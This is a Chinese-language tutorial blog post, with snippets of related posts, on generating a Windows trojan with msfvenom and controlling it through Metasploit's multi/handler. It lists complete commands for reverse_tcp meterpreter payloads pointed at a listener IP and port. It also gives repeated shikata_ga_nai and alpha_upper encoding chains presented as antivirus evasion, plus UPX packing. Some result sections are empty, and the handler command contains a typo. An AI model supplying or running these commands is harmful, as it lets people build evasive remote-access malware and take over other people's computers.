利用msfvenom生成木馬程式

2021-07-10 16:29:00 字數 1544 閱讀 2923

一,目的:熟悉msfvenom生成木馬程式過程,並執行和監聽控制.

二,工具:msf

三,原理:msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令列,和效率.利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線

四,過程:

1,檢視幫助

命令: root# msfvenom -h

結果:

2,生成meterpreter payload 並利用shikata_ga_nai編碼,檢視所需選項,利用 -o引數

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

結果:

3,現在設定lhost,即監聽主機ip和lport監聽埠,我是本地區域網測試,所以ip是192.168.1.113,埠設定成443.所以最後連線會通向192.168.1.113的443埠

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 『\x00』 lhost=192.168.1.113 lport=443 -f exe > abc.exe

注:如果只是用msfpayload生成,簡單示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.113 x > desktop/abc.exe

多次生成可進行免殺:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/desktop/acn.exe

upx加殼:upx -5 /root/desktop/acn.exe

結果:

說明:  -p payload

-e 編碼方式

-i 編碼次數

-b 在生成的程式中避免出現的值

lhost,lport 監聽上線的主機ip和埠

-f exe 生成exe格式

4,把生成的abc.exe放到win7下.執行.

5,在命令列下,開啟msfconsole.

命令: root # msfconsole

6,本機監聽,因為之前用的是reverse_tcp,所以設定如下

命令: msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

結果:

7,現在快完成了,設定lhost,lport,並執行exploit,會發現有連線進來.

8,.驗證

msfvenom木馬生成

kali winxp 生成木馬檔案 msfvenom p windows meterpreter reverse tcp lhost ip lport 4444 f exe a.exe 開啟msfconsole,等待檔案執行彈回shell use exploit multi hander set p...

利用msfvenom生成木馬程式

一,目的 熟悉msfvenom生成木馬程式過程,並執行和監聽控制.二,工具 msf 三,原理 msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令列,和效率.利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線 四,過程 1,檢視幫助 命令 root...

利用msfvenom生成木馬檔案

當我們需要往目標機上傳木馬檔案時,我們就可以利用msfvenom生成乙個木馬檔案,並用metersploit進行監聽,就能夠 回shell。我們製作的木馬檔案有沒有免殺功能,可以在virscan中進行掃瞄檢測一下。或者在本地用一些防毒軟體進行檢測。1.生成windows木馬程式。生成乙個window...